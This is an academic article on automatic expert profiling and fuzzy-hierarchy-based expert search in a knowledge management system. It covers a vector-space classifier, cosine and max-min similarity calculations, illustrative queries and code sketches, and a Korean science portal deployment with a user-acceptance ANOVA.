In this section, we explain the structure of the expertise we define in this article and introduce how to train the automatic expert classifier, through which initial similarity measures among subject fields are derived.
Structure of an Expert Profile Enabling the search capability for experts requires building an expert profile database, which provides the detailed information of the expertise individual experts possess. In this article, we define an expert profile as a collection of information showing the types of expertise and the levels of expertise in each subject field, which a certain expert possesses. An expert might possess expertise in more than one subject field and one’s expertise might change over time due to the changes in interests or the subject field itself. Therefore, a constant and systematic update for expert profiles is needed to keep the profile information useful and current. In this sense, an automatic expert profiling mechanism has advantages over the manual profiling process. To build an expert profile database, we assume that expertise can be measured based on the following factors: (1) activeness, (2) relevance, and (3) usefulness. Activeness means how frequently an expert performs knowledge creation activities by registering knowledge artifacts into the system. In more detail, activeness can be decomposed into recency, frequency, and volume. Recency should be taken into account to evaluate a knowledge artifact since its value can change due to the fact that most of the knowledge registered into KMS becomes obsolete over time in general. Therefore, a knowledge artifact should be adjusted by the time factor determining its value. Frequency is actualized by the number of knowledge artifacts contributed by a certain expert. The more knowledge an expert registers, the more expertise we
can think he or she has. Finally, the volume factor is adopted to acknowledge experts who provide knowledge artifacts in large volumes. Generally speaking, a knowledge artifact in large volume can convey more information and the system at least should acknowledge the time and effort of registering such lengthy knowledge artifacts. The following formula shows the activeness measure of expertise explained above.
$\sum_{i=1}^{n} w_{rj}(T_i) \times w_{vj}(V_i)$    (1)
where, Ti and Vi denote the time factor of knowledge artifact i, in which it is registered, and its volume factor respectively. For example, the number of days passed or the time elapsed from a specific point in time since a certain knowledge artifact is registered can be used for Ti, and the number of words can be substituted for Vi. Also, note that wrj is the weight of the recency factor in field j, and wvj is the weight of the volume factor in field j. Since different subject fields may have a different total base of knowledge artifacts registered on the knowledge base, which gives different standards such as the frequency and the average volume of knowledge artifacts to calculate the recency and volume factors of the newly registered knowledge artifact, weights for those two factors should be adopted to adjust the differences among subject fields. For example, let us think that there are subject fields called “EC” and “Mainframe” respectively in IT category. In this case, it is highly probable that new knowledge artifacts concerning “EC” will be registered more frequently with higher volume than those of “Mainframe” these days. The frequency factor can be automatically accumulated when the summation of all other factors is obtained since every knowledge artifact would be influenced by this activeness calculation. Therefore, the more knowledge artifacts an expert registers, the more knowledgeable in that subject field we can think he or she is. For a certain expert, the total summation of all the
calculated values from this formula represents the level of activeness of the expert in a certain subject field.
The second component of expertise, relevance, means how close a knowledge artifact is to a specific subject field. If it is possible to evaluate a registered knowledge artifact to find out which field it belongs to and how well it fits into the field, we can utilize this factor to determine the relevance of the expert having registered the knowledge artifact in the specific subject field. The relevance can be obtained as shown in the following formula (2):
$\sum_{i=1}^{n} S_j(D_i)$    (2)
where $D_i$ is a document or knowledge artifact i, and $S_j$ is the relevance score of a certain artifact for field j. The relevance score, $S_j$, is measured by the automatic expert classifier, which is trained through machine learning beforehand using training documents. Actually, the expert classifier returns the complete list of fitness scores, from the highest to the lowest, along with all the subject fields defined in the subject field hierarchy. The highest fitness score, which tells how close the knowledge artifact is to a specific field, is used for the relevance score in this case. For the simplicity of calculation, only the highest relevance score is used. However, if we expand to take multidisciplinary knowledge, which is popular in the contemporary research community, two or three scores from the list can be used.
The usefulness factor is also important to determine the value of the registered knowledge artifact. Even though very distinguished knowledge is registered on the system, it is not useful or meaningful unless other users make use of it and find it so. Therefore, the addition of other users' evaluation for the registered knowledge in the expertise measuring process is reasonable. The usefulness factor can be represented as follows:
$\sum_{i=1}^{n} \sum_{k=1}^{m} A_k(D_i)$    (3)
where $A_k$ denotes the usefulness point given by user k about document i. Since a knowledge artifact can be utilized and evaluated by more than one user, all the usefulness factors from the users of document i, $D_i$, should be accumulated, and all the usefulness factors for a certain expert can be gained by summing up the usefulness factors of every knowledge artifact registered by that expert, as shown in formula (3).
Training Process of Automatic Expert Classifier
To enable classifying registered knowledge artifacts automatically as well as to derive the initial similarity measures among subject fields, the automatic expert classifier should be trained using training documents. In this section, we explain how to train the automatic expert classifier based on a text categorization technique using the Vector Space Model (Baeza-Yates & Riberio-Neto, 1999; Lee, Chuang & Seamons, 1997; Salton & Lesk, 1968; Salton & Yang, 1973). There have been active studies on measuring similarities among documents, and many different techniques such as latent semantic indexing (LSI) (Furnas, Deerwester, Dumais, Landauer, Harshman, & Streeter, 1988), the Bayesian Probabilistic Model (Turtle & Croft, 1991), and the vector space model (VSM) have been proposed. Among those text representation models, VSM has been chosen in this article to train the classifier and measure similarity values among subject fields since it shows the optimal performance in many research results (Baeza-Yates & Riberio-Neto, 1999). We propose three steps to train the automatic expert classifier. During the training process, initial similarity measures among subject fields sharing the same parent nodes on the subject field hierarchy are calculated and assigned, which will be used in fuzzy logic calculations to come up with the similarities for any possible pair of two subject fields in the hierarchy. The following subsections will elaborate the three steps in more detail.
Figure 2. Training of automatic expert classifier
Figure 2 depicts the training process of the automatic expert classifier, which involves Steps 1 through 3 explained in this section, along with the expert profiling procedure using the trained classifier.
Step 1: Preparing Training Documents
Documents for training the automatic expert classifier should be prepared with preassigned subject fields. In order to ensure the effectiveness of the training documents, two assumptions are needed. First, each training document is assigned a correct subject field. Second, the set of training documents belonging to a specific subject field wholly represents the field itself with the terms used in the documents. Once those assumptions are made, meaningful terms can be extracted from the training documents to build a vector space for each subject field, which is later used to classify
the newly registered knowledge artifacts in the form of documents.
Step 2: Building a Subject Field Vector for Each Subject Field A subject field vector describes the list of all the meaningful terms extracted from a certain subject field’s aggregate document and the relative importance of each term in representing the subject field. In this step of the training process, the field vector (FVj) for each subject field is assembled from the aggregate document (ADj) of each field. To build subject field vectors out of training documents, the following concepts are used. First, a term set (TS) is a collection of meaningful terms extracted from the entire training documents to represent their contents, eliminate grammatical constructs such as articles, conjunctions, and so
forth. Let us consider that there are a total of 15 documents consisting of five meaningful terms as illustrated in Figure 3. In this case, the term set for this document collection would be TS = {Calculus, Dimension, Algorithm, Software, Pressure}, and pairs of each term and its frequency in each document are compiled as term vector spaces for needed calculations. Second, an aggregate document (ADj) is the concatenation of all the meaningful terms compiled from documents as shown with DSj (Document Set) = {Dj1, Dj2, …, Djd}, which belong to a specific subject field ( j) where j = 1, …, N. N is the total number of fields defined and j is the index of the subject field. Also, d denotes the number of documents belonging to subject field j. In other words, an aggregate document contains all the occurrences of meaningful terms belonging to the specific subject field concerned. As an example in Figure 3, there are five subject fields named Mathematics, Physics, Physical Chemistry, Computer Science, and Mechanical Engineering, each of which contains three documents respectively. In this case, the document set DSMathematics aggregates documents D11, D12, and D13, and formulates the aggregate document ADMathematics. By the same token, DSPhysics aggregatesD21, D22, and D23 formulates ADPhysics. FVj (field vector for subject field j) is composed of terms belonging to the term set and the explana-
tory level of those terms in a specific field. The formulas for formulating $FV_j$ are as follows:
$FV_j = \{(t_1, w_{j1}), (t_2, w_{j2}), \ldots, (t_p, w_{jp})\}$    (4)
where p denotes the total number of index terms, and the explanatory level of term $t_p$ for $AD_j$ (field j), $w_{jp}$, can be obtained by
$w_{jp} = tf_{jp} \times idf_p$    (5)
$tf_{jp} = freq_{jp} / \max_l(freq_{jl})$    (6)
$idf_p = \log(N / n_p)$    (7)
We can gain the comparative importance of term tp (wjp) in ADj (field j) from the product of tf jp and idfp as shown in (5). tf jp in (6) can be calculated by the raw frequency of a specific term (tp) in field j, which is denoted by freq jp, divided by maxl ( freq jl) that is the maximum number of occurrences of a single term being mentioned in the aggregate document concerned or field j. N is the total number of aggregate documents and np is the number of documents in which the concerned index term appears. While term frequency (tf jp) concerns the occurrence of a certain term within a document, inverse document frequency (idfp) concerns the term’s occurrence across a collection of documents. It means that terms which rarely
Figure 3. Vector space formulation
appear over a collection of documents are more meaningful and important in distinguishing a certain document including the terms from other documents without them. Therefore, idfp in (7) is the inverse document frequency of term tp and its importance is inversely proportional to the number of documents containing tp denoted by np. Let us take Figure 3 as an example. In this example, we assume that there are the frequencies of each term in the aggregate documents ADj of five fields as shown in Table 1. From Table 1, the field vectors can be derived for five different fields. The explanatory level of each term belonging to the term set, TS, can be calculated to show
how much each term explains the specific field or how well it represents the field concerned. For example, the following shows the explanatory level calculations for “Mathematics” and “Physics” as well as assembling of field vectors (FV) for those subject fields. Table 2 shows the result of all the field vector calculations for the example used in this section.
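A hedged sketch of how formulas (4)–(7) could be computed over per-field aggregate documents is shown below; the tokenization, the logarithm base, and the toy data are assumptions not fixed by the chapter, and the function name is illustrative.

import math
from collections import Counter
from typing import Dict, List

def build_field_vectors(aggregate_docs: Dict[str, List[str]]) -> Dict[str, Dict[str, float]]:
    """Return each field's vector of (term, tf*idf) explanatory levels."""
    n_fields = len(aggregate_docs)                       # N in formula (7)
    term_freqs = {f: Counter(tokens) for f, tokens in aggregate_docs.items()}
    # n_p: number of aggregate documents in which each term appears.
    doc_freq = Counter(t for counts in term_freqs.values() for t in counts)
    vectors = {}
    for f, counts in term_freqs.items():
        max_freq = max(counts.values())                  # max_l(freq_jl) in (6)
        vectors[f] = {
            # (5)-(7); terms occurring in every field get idf = log(1) = 0.
            t: (freq / max_freq) * math.log(n_fields / doc_freq[t])
            for t, freq in counts.items()
        }
    return vectors

# Toy aggregate documents (tokenized), not the chapter's Table 1 data:
fields = {
    "Mathematics": ["calculus", "calculus", "dimension", "algorithm"],
    "Physics":     ["pressure", "dimension", "calculus"],
}
print(build_field_vectors(fields)["Mathematics"])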
Step 3: Calculating the Initial Similarity Measures Among Subject Fields
Before the searching capability for experts in similar or related fields using FAH is enabled, the
initial similarity measures among subject fields should be calculated and assigned. Since the aggregate document vectors derived from previous steps contain the vectors of each term's explanatory level for each subject field, it is possible to calculate the similarity level among specific pairs of subject fields if the Cosine Similarity Function method applies (Baeza-Yates & Riberio-Neto, 1999). Generally, the similarity between two vectors can be represented as $\cos\theta$ calculated from the two vectors, and the following equation (8) shows the mathematical representation of this similarity function:
$sim(FV_1, FV_2) = \cos\theta = \dfrac{FV_1 \cdot FV_2}{\|FV_1\| \times \|FV_2\|}$    (8)
$FV_1 \cdot FV_2$ denotes the inner product of the two vectors $FV_1$ and $FV_2$, and $\|FV_1\|$ represents the norm of vector $FV_1$. Calculated field similarity values are combined to build FAH based on generalization and abstraction relationships. In addition, to be able to use derived similarity values among subject fields as similarity measures in FAH, those values should be within the range of 0 and 1 following the definitions of FAH. Since the similarity measure between two vectors is derived from the value of
calculated cosθ between the two vectors, the value domain condition is satisfied due to the fact that cosine value is always between 0 and 1. Once the automatic expert classifier is trained, it is utilized to build an expert profile database by analyzing the knowledge artifacts contributed by each expert. The expert profile structure explained in the previous section is used to measure the overall expertise level of each expert. The composition scheme for three factors, which are activeness, relevance, and usefulness, is dependent upon the organization employing the proposed framework. For example, the simple summation of three factors with different weights can be used to combine three calculated factors. In addition, the routine update of the expert profile database as well as the retraining of the automatic expert classifier is required to accommodate the changes that occur to the subject fields and the registered experts themselves.
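The sketch below illustrates formula (8) over the sparse field vectors of Step 2, together with one possible weighted summation of the activeness, relevance, and usefulness factors. The weight values and function names are illustrative assumptions, since the chapter leaves the composition scheme to the adopting organization.

import math
from typing import Dict

def cosine_similarity(v1: Dict[str, float], v2: Dict[str, float]) -> float:
    """Formula (8): cosine of two sparse, non-negative field vectors (range 0..1)."""
    dot = sum(w * v2.get(t, 0.0) for t, w in v1.items())
    norm1 = math.sqrt(sum(w * w for w in v1.values()))
    norm2 = math.sqrt(sum(w * w for w in v2.values()))
    return dot / (norm1 * norm2) if norm1 and norm2 else 0.0

def expertise_level(activeness: float, relevance: float, usefulness: float,
                    weights=(0.4, 0.4, 0.2)) -> float:
    """One possible weighted summation of the three expertise factors."""
    wa, wr, wu = weights
    return wa * activeness + wr * relevance + wu * usefulness

print(cosine_similarity({"calculus": 0.9, "dimension": 0.1},
                        {"calculus": 0.2, "pressure": 0.8}))
print(expertise_level(0.7, 0.9, 0.5))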
INTELLIGENT SEARCH FOR EXPERTS USING FAH

In this section, we explain how to adopt FAH in enabling searches for experts in similar fields and
introduce a prototype system we built in applying the expert management framework we propose in this article.
Applicability of FAH

To exploit the tacit knowledge of experts in KMS, it is important to provide an effective and efficient way to pinpoint the experts whose expertise matches users' information needs, as well as to properly compile expert profiles. This enables users to reach the experts whose knowledge they need. In searching for needed experts, the system might not always return satisfactory results for users' queries, for reasons such as a limited expert pool or the lack of experts in certain fields. When exact matches to a user's query cannot be found, providing experts in similar or related fields instead may increase the user's satisfaction, since those with similar expertise are often the best options available within the organization concerned. In addition to finding experts in similar or related fields, it is also helpful to let users know how well the retrieved experts meet the search criteria by providing fitness scores for subject fields or a ranking among the search results. By combining FAH with a text categorization method, two additional kinds of useful information can be provided for users. One is the set of similarity measures among subject fields, calculated from the field hierarchy using FAH's fuzzy logic, for determining who possesses expertise in similar or related fields. The other is the fitness score of each expert in the selected field, showing how much expertise each expert possesses for that specific field. Providing both the similarity measures among fields and the fitness score of each expert in each field can help KMS users find needed experts more effectively.
Similarity Measure Calculation Using Max-Min Operator

In this section, we show the similarity measure calculation process for subject fields that are far from each other in the defined subject field hierarchy, using the max-min operator of fuzzy logic (Zadeh, 1973). The calculation uses the initial similarity measures, derived during the classifier training session, between two subject fields sharing the same upper-level parent node. Since the initial similarity measures among subject fields are represented as fuzzy numbers in FAH, we use max-min composition, the most popular composition method for fuzzy numbers, for the similarity measure calculation (Dubois & Prade, 1980). FAH considerably reduces the creation and maintenance costs for a hierarchy by decreasing the number of similarity measures that must be explicitly assigned. In other words, only similarity measures for sibling nodes sharing a parent need to be assigned, leaving the other measures to be calculated using the max-min composition operation. Based on the multilevel abstraction concepts of FAH, the similarity measure between n-level siblings should monotonically decrease as the abstraction level (sibling level) n increases. For example, similarity measures among 2-level sibling fields cannot be greater than those among 1-level siblings and cannot be smaller than those among 3-level siblings. This monotonic property of a decreasing similarity measure with respect to the abstraction level can be summarized in the following proposition.
Proposition 1: Monotonically Decreasing Similarity

The similarity measure between (n+1)-level sibling fields should not be greater than that between n-level sibling fields, where n >= 1.

Meanwhile, to reduce the number of sibling pairs requiring initial similarity measure assign-
ment, the similarity values among n-level sibling fields (n >= 2), for which similarity measures are not assigned explicitly, are calculated using the max-min composition operator of fuzzy relations, while the similarity measures among 1-level sibling fields are derived from the Vector Space Model explained previously. As an example, the similarity measure between "Mathematics" and "Computer Science" in Figure 1 can be calculated if initial similarity measures among 1-level sibling fields are given. As explained previously, similarity measures among 1-level sibling fields are derived through the training process of the automatic expert classifier. It is possible to assign all the field similarity measures, regardless of the level of their relationships, using the same procedure as for 1-level similarity derivation. However, this approach has the following shortcomings: (1) it requires heavy calculation, depending on the size of the subject field hierarchy, since it considers all possible pairs of siblings and calculates the desired values for them; and (2) the calculation results cannot always guarantee Proposition 1, meaning that the calculated similarity measures among 2-level sibling fields might sometimes be greater than those among 1-level sibling fields as a consequence of exceptional training documents in certain fields. Therefore, we derive similarity measures only for 1-level sibling fields using training documents
during the training process and calculate higher level similarity measures based on the max-min operation while satisfying Proposition 1. Figure 4 shows the process of similarity measure calculation among 2-level siblings using the max-min operation, with a simplified example of FAH. In the figure, rectangles represent subject fields and solid lines depict the hierarchical structure among subjects, such as p1 being the parent of a1 and a2. Also, a thick line shows the feasible path connecting two subject fields along the hierarchical structure of FAH. Numbers along the dotted arrows represent the similarity measures between the two fields connected by each arrow. For the links on each path, the min operation is used to compute the similarity measure for the entire path, and if there are multiple paths between two fields, the max operation is used to select the path with the largest similarity measure. Let us calculate the similarity measure between a1 and b3 from the figure. Here, a1 and b3 are subject fields belonging to the higher level fields p1 and p2, respectively, and their parent nodes, p1 and p2, share the same parent node (not shown in the figure), making a1 and b3 2-level siblings. The result of fuzzy relation composition using the max-min operation for a1 and b3 is as follows.

(Derived) sim(a1, b3) = Max [Min [sim(a1, p1), sim(p1, p2), sim(p2, b3)]]   (9)
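As a minimal illustration of this composition (ours, not code from the article), the sketch below applies the min operator along each feasible path and the max operator over alternative paths; the 0.4 value is the assumed sim(p1, p2) of Figure 4, and parent-child links are fixed at 1.

```python
# Explicitly assigned pairwise similarity measures: parent-child links are
# fixed at 1 and sim(p1, p2) = 0.4, as in the Figure 4 example.
assigned_sim = {
    ("a1", "p1"): 1.0,
    ("p2", "b3"): 1.0,
    ("p1", "p2"): 0.4,
}

def link_sim(x, y):
    return assigned_sim.get((x, y), assigned_sim.get((y, x), 0.0))

def derived_sim(paths):
    """Max over feasible paths of the min similarity along each path (eq. 9)."""
    return max(
        min(link_sim(a, b) for a, b in zip(path, path[1:]))
        for path in paths
    )

# In FAH each child has a single parent, so only one feasible path exists here.
paths_a1_b3 = [["a1", "p1", "p2", "b3"]]
print(derived_sim(paths_a1_b3))   # 0.4, as derived in equation (10) below
```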
Figure 4. Similarity measure calculation using max-min operation (the feasible path a1 → p1 → p2 → b3, with parent-child similarity 1 and sim(p1, p2) = 0.4)
As illustrated in Figure 4, FAH has a hierarchical structure in which each child has only one parent. Consequently, there exists only one feasible path from a1 to b3, namely a1 → p1 → p2 → b3. If we assume that the similarity measure between a parent and a child is always 1, equation (9) can be transformed into the following:

(Derived) sim(a1, b3) = Min [sim(a1, p1), sim(p1, p2), sim(p2, b3)] = Min [1, sim(p1, p2), 1] = sim(p1, p2) = 0.4   (10)

We can see that by fixing the similarity measure between parent and child at 1, the derived similarity measure between a1 and b3 is the same as the similarity measure between their parents, p1 and p2. Meanwhile, it should be noticed that (Derived) sim(a1, b3) = 0.4, resulting from equation (10), is greater than sim(b1, b2) = 0.3, which does not satisfy Proposition 1. To remedy this anomaly, we define the extended similarity as in equation (11), incorporating the concept of sibling level formulated from the abstraction level in the hierarchy:

(Extended) sim = {(Max(level difference) − level difference) + (Derived) sim} / Max(level difference)   (11)

where the level difference among n-level siblings is n and Max(level difference) is the largest possible sibling level between two subject fields in the hierarchy; both are 2 in this example. Equation (11) shows that the final similarity measure, the extended similarity, is calculated from the derived similarity by incorporating the level difference so as to satisfy the monotonically decreasing similarity constraint. By adding "Max(level difference) − level difference" to the derived similarity (or, for 1-level siblings, simply to the similarity measure derived from the automatic expert classifier), we can guarantee that the final similarity measure between two fields becomes smaller as the level difference gets larger. In addition, we normalize the calculated similarity measure to a value between 0 and 1 by dividing it by the maximum level difference. The proof that (Extended) sim satisfies Proposition 1 is as follows.

Proof of Proposition 1. Let a and b be the (Derived) sim between n-level siblings and between (n+1)-level siblings, respectively. If Max(level difference) is M and the (Extended) sim values of a and b are Ea and Eb, then

Ea − Eb = {(M − n) + a}/M − {(M − (n+1)) + b}/M = (M − n + a − M + n + 1 − b)/M = (a − b + 1)/M.

Because 0 ≤ a ≤ 1, 0 ≤ b ≤ 1, and M > 0, we have −1 ≤ a − b ≤ 1 and 0 ≤ a − b + 1 ≤ 2. Therefore, (a − b + 1)/M ≥ 0 and Ea ≥ Eb.

The final similarity measure between a1 and b3 in the example is sim(a1, b3) = {(2 − 2) + 0.4}/2 = 0.2. The final similarity measure derived from the above calculation process is used, through FAH operations, to obtain the list of experts appropriate for a user's search criterion. We elaborate on the detailed search process for experts in the following section.

Search Process for Experts in Similar Subject Fields

Once the expert profiling process is completed so that experts are assigned to individual subject fields and similarity measures among the subject fields are determined, it is possible for users to search for the experts they need as well as for other experts in similar or related fields. More precisely, when no experts are found in the specific field requested in a user's query, the search capability for similar-field experts can provide useful alternative results, in the sense that experts with similar expertise are the best candidates available within the organization for the user. Moreover, when returning
the search results, it is ideal to list the candidate experts in the order of similarity level to the user’s requested expertise. This additional intelligence is specifically possible using the similarity measures among subject fields based on FAH. Figure 5 shows the general process of a search for experts proposed in this article using UML’s activity diagram. An activity diagram is a useful tool to depict sequencing of activities, each of which represents a state of doing something (Booch, Rumbaugh & Jacobson, 1999). Simply, an oval represents an activity and an arrowed line shows the sequence from one activity to another. Using a diamond-shaped figure, we can show a conditional branch. A search for experts starts with a user’s keyword input, which the system uses to find matches in the field names from the subject field hierarchy. Field name matching starts with the lowest level in the hierarchy. If no matches are found,
the search moves to target the next higher level for keyword matching. From the lowest level to the top, if a field name in the hierarchy is found, the expert list for that field is compiled from the expert profile database. There is one more step involved before proceeding to FAH operations, which provide the search capabilities for similar field experts. If there are not any matches even though searching is completed all the way to the top level of the field hierarchy, a search thesaurus participates in the process. We adopt this thesaurus approach because it can remedy possible problems that result from typos or synonyms, which are very likely to happen while entering a keyword. For example, let us say there is a subject field called “Electronic Commerce” in the hierarchy. In this case, if a user types “EC” instead, the system would not return any expert lists unless it uses other mechanisms in addition to word-for-word matching. The search thesaurus plays an impor-
Figure 5. Activity diagram of search for experts (swimlanes for the User, Query Processor, FAH Engine, and Thesaurus; activities include entering a search keyword, field search with moves to higher levels, thesaurus lookup and keyword correction, expert profile search, FAH operations, and display of the expert list or a message)
tant role in changing the input keyword "EC" to "Electronic Commerce" so that the system can perform the rest of the search function. By the same token, the search thesaurus can be used to correct a wrong input keyword in case of typos. If the list of experts compiled as the search result is not satisfactory enough, FAH operations, either query relaxation or query tightening, can be performed. More precisely, when there are too many experts being listed, query tightening can be applied to tighten the search conditions by reducing the search space with a more specific field name chosen from the field name list given by the system. On the contrary, in case of too few search results, query relaxation can provide a larger group of experts by including experts in similar fields. To demonstrate and explain the search process for experts through FAH operations introduced in Figure 5, we use a simplified expert profile database that is defined as the following database table: EXPERT {(id, name, field, level)}. Figure 6 illustrates the intelligent search process for experts based on the expert profile database defined here. For example, if a user wants to find out who the experts are in "Math" or similar fields, the query would be written as "SELECT NAME, FIELD FROM EXPERT WHERE FIELD =? 'Math'" using the user's input keyword. In the original query, query relaxation is specified by the relaxation operator "=?" upon the user's request. If we use the field hierarchy defined in Figure 1, the result of this original query is null because "Math" does not exist as a subject field in the hierarchy. In this case, "Math" will be replaced with "Mathematics," which can be retrieved from the search thesaurus as shown in Figure 5. Since query relaxation is requested by the user, the generalized query becomes "SELECT NAME, FIELD FROM EXPERT WHERE FIELD is-a Generalize('Mathematics', 1)" by finding the 1-level abstract field of "Mathematics." An additional query language construct, is-a, indicates the generalization relationship between
a specialized field and an abstract field. In the generalized query, Generalize('Mathematics', 1) returns the 1-level abstract field, "Natural Science," and thus the query condition is relaxed to "WHERE FIELD is-a 'Natural Science'". Since the search condition is relaxed to have "Natural Science" as the subject field, all the experts classified in "Physics" and "Physical Chemistry," which are 1-level sibling fields of "Mathematics," will be included in the search result. Also, similarity measures between "Mathematics" and the other fields can either be retrieved, for 1-level sibling fields, or calculated using the max-min operator if the specified level for generalization is 2 or above (Moon & Huh, 2003). Query tightening, on the contrary, is performed through the specialize operation. It returns the list of specialized fields at the specified level below. For example, in the query "SELECT NAME, FIELD FROM EXPERT WHERE FIELD in Specialize('Natural Science', 1)," the 1-level specialization of the abstract field "Natural Science" returns a set of specialized fields ("Mathematics," "Physics," "Physical Chemistry") as the result. Thus, the query condition of the specialized query is finally written as "FIELD in ('Mathematics', 'Physics', 'Physical Chemistry')" and the user can choose a certain field out of the retrieved ones to reduce the search results. In addition, we can get all the n-level sibling fields with a certain level of similarity or above using query approximation. If a search query is given as "SELECT NAME, FIELD FROM EXPERT WHERE FIELD is-a Approximate('Mathematics', 2, 0.5)," 2-level sibling fields of "Mathematics" with a similarity measure of 0.5 or above are to be retrieved. In this case, they are "Computer Science" and "Mechanical Engineering," since they have a derived similarity of 0.6 with "Mathematics." To simplify the illustration, we assume that there are only eight experts and their expertise details are summarized in Table 3. The subject field hierarchy defined in Figure 1 is used and
Figure 6. Example process of FAH-based search for experts (the original query on 'Math' with the relaxation operator '=?', keyword correction through the search thesaurus, query relaxation/generalization, further relaxation, query specialization, and query approximation, together with the resulting expert lists and expertise levels)
Table 3. Similarity calculation for intelligent search for experts
Expert | Subject Field | Expertise Level | sim / (Derived) sim with 'Mathematics' | (Extended) sim with 'Mathematics' | Expertise Level × (Extended) sim
John | Mathematics | 23.5 | 1 | {(2−1)+1}/2 = 1 | 23.5 × 1 = 23.5
Sally | Mathematics | 12.6 | 1 | {(2−1)+1}/2 = 1 | 12.6 × 1 = 12.6
Sam | Mathematics | 7.8 | 1 | {(2−1)+1}/2 = 1 | 7.8 × 1 = 7.8
Peter | Physics | 11.3 | 0.6 | {(2−1)+0.6}/2 = 0.8 | 11.3 × 0.8 ≈ 9.0
Smith | Physics | 4.1 | 0.6 | {(2−1)+0.6}/2 = 0.8 | 4.1 × 0.8 ≈ 3.3
Brown | Mechanical Engineering | 22.1 | 0.6 | {(2−2)+0.6}/2 = 0.3 | 22.1 × 0.3 ≈ 6.6
Lucy | Mechanical Engineering | 9.8 | 0.6 | {(2−2)+0.6}/2 = 0.3 | 9.8 × 0.3 ≈ 2.9
Kevin | Mechanical Engineering | 1.6 | 0.6 | {(2−2)+0.6}/2 = 0.3 | 1.6 × 0.3 ≈ 0.5
the similarity calculations for a search on field “Mathematics” are also shown in Table 3.
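A small sketch (ours, not the article's implementation) that reproduces the Table 3 calculation: each expert's expertise level is weighted by the extended similarity of equation (11) between the expert's field and the queried field "Mathematics", and the experts are ranked by the weighted score.

```python
# (derived sim with 'Mathematics', level difference) per field, as in Table 3;
# the level difference is 1 for the field itself and its 1-level siblings,
# 2 for 2-level siblings, and the maximum level difference M is 2.
M = 2
fields = {
    "Mathematics":            (1.0, 1),
    "Physics":                (0.6, 1),
    "Mechanical Engineering": (0.6, 2),
}

experts = [  # (name, field, expertise level), as in Table 3
    ("John", "Mathematics", 23.5), ("Sally", "Mathematics", 12.6),
    ("Sam", "Mathematics", 7.8),   ("Peter", "Physics", 11.3),
    ("Smith", "Physics", 4.1),     ("Brown", "Mechanical Engineering", 22.1),
    ("Lucy", "Mechanical Engineering", 9.8),
    ("Kevin", "Mechanical Engineering", 1.6),
]

def extended_sim(derived, level_diff, max_diff=M):
    """(Extended) sim = {(M - level difference) + (Derived) sim} / M, eq. (11)."""
    return ((max_diff - level_diff) + derived) / max_diff

ranked = sorted(
    ((name, field, level * extended_sim(*fields[field]))
     for name, field, level in experts),
    key=lambda row: row[2], reverse=True,
)
for name, field, score in ranked:
    print(f"{name:6s} {field:24s} {score:5.1f}")   # John 23.5, Sally 12.6, Peter 9.0, ...
```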
Application of Expert Management in Knowledge Portal

The intelligent search concept for experts proposed in this article has been applied to the "Knowledge Portal for Researchers in Science and Technology" sponsored by the Ministry of Science and Technology (MOST) of Korea, and it is currently in public service. The automatic expert classifier was developed in Java, and RAINBOW (McCallum, 1996), developed at Carnegie Mellon University, was chosen as the text categorization engine in Knowledge Portal. Figure 7 is a sample screenshot of Knowledge Portal providing the results of the search functionality for experts explained in this section. To build the subject field hierarchy for FAH in Knowledge Portal, we use the classification system for scientific and technological fields,
which was established by the Korea Science Foundation (KSF). KSF classifies all the scientific and technological research fields, which are extensive and complex, using three different levels of classes: upper, middle, and lower. The KSF classification system has four upper classes, "Natural Science," "Life Science," "Engineering," and "Multi-disciplinary," and these upper classes include a total of 69 different middle-class subject fields. Each middle-class field has seven to eight lower classes on average, bringing the total number of lower classes in the hierarchy to 523. In Knowledge Portal, this subject field hierarchy is used for registering users' subject fields of interest, classifying the registered knowledge artifacts, assigning the subject fields for each expert through the automatic profiling process, and applying FAH operations in the intelligent search process while interacting with system users who perform searches for experts. For the initial training of the automatic expert classifier, we used 1,400 research project proposal
Figure 7. Sample screenshot of search for experts in knowledge portal
documents, which were also provided by KSF. Since each of these documents had a predefined subject field, which was both the field the research proposal dealt with and one of the subject fields defined in the KSF field hierarchy, we decided that those proposal documents were good sources for training and testing the performance of the automatic expert classifier we implemented. We used about 60% of the documents for training and the remaining 580 documents for validating the classification correctness of the classifier. Due to the limited number of documents, we measured the classification correctness only up to the middle-class level. When we considered the ten subject fields with the largest numbers of documents, 73.25% of the documents were classified correctly, and the average classification correctness rate was about the same across these subject fields. We expect to incorporate the lower-level classes of subject fields in the training process, while maintaining a satisfactory level of classification correctness, if enough training documents can be collected for each field.
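A sketch of the kind of hold-out evaluation described above; the train_fn and predict_fn callables are hypothetical placeholders for the automatic expert classifier, and the split ratio mirrors the roughly 60/40 division of the KSF proposal documents.

```python
import random

def evaluate_classifier(documents, labels, train_fn, predict_fn,
                        train_ratio=0.6, seed=0):
    """Hold-out evaluation: train on ~60% of the labeled documents and
    report classification correctness on the remainder."""
    indices = list(range(len(documents)))
    random.Random(seed).shuffle(indices)
    cut = int(len(indices) * train_ratio)
    train_idx, test_idx = indices[:cut], indices[cut:]

    model = train_fn([documents[i] for i in train_idx],
                     [labels[i] for i in train_idx])

    correct = sum(
        1 for i in test_idx if predict_fn(model, documents[i]) == labels[i]
    )
    return correct / len(test_idx)   # e.g., 0.7325 for 73.25% correctness
```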
To test the potential user acceptance of the proposed framework in their work, we conducted an empirical experiment. The participants were 75 undergraduate students in IT-related majors. They were randomly divided into two groups, one with 37 students for a traditional system and the other with 38 students for the FAH-based system. The first group was introduced to and used the legacy system, a KMS with manual expert profiling and conventional expert search functions. The second group was introduced to the new system, equipped with automatic expert profiling and FAH-based search features. Their perceived usefulness and perceived ease of use of each system were measured using the well-known 12 items from the study of Davis (1989). They were asked to rate the extent to which they agreed with each statement about the system they experienced on a seven-point scale ranging from "Strongly Agree" to "Strongly Disagree." From the responses, we ruled out three outlier cases, so that finally 35 cases for the legacy system and 37 for the FAH-based system were used for the statistical analysis. To see the differences between
Table 4. Results of ANOVA
Measure | Source | Sum of Squares | df | Mean Square | F | Sig.
Perceived Usefulness | Between Groups | 13.784 | 1 | 13.784 | 41.463 | .000
Perceived Usefulness | Within Groups | 23.270 | 70 | .332 | |
Perceived Usefulness | Total | 37.054 | 71 | | |
Perceived Ease of Use | Between Groups | .994 | 1 | .994 | 2.685 | .106
Perceived Ease of Use | Within Groups | 25.911 | 70 | .370 | |
Perceived Ease of Use | Total | 26.904 | 71 | | |
